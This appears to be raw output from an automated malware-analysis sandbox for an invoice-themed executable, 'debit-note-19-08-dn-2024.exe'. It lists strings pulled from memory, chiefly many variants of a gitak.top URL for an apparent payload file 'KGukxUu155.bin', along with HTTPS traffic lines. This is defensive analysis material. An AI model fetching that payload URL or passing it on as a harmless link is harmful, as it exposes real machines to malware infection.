Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15722470782.0000000035320000.00000004.00001000.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin#
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin)
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin/
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin/KGukxUu155.bin
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin/KGukxUu155.binID=
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin/a
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin/m
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin/u
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin0
Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin:
Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin?o
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.binID=
Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.binR
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin_
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bina
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bincy
Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bine
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.binificateChainPolicy
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bink
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.binl
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.binm
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bino(
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.binu
Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.binurT
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin~5
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/KGukxUu155.bin~53
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/a
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/m
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitak.top/u
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739260417.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12633967289.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160436121.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11897223878.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265722845.0000000005BF7000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15156086659.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11476497728.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.0000000007570000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14841282529.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000753780.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581843152.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15365675266.0000000005C53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.12739260417.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15470510829.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12633967289.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11897223878.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15156086659.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.0000000007570000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14841282529.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15680230484.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000753780.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15365675266.0000000005C53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
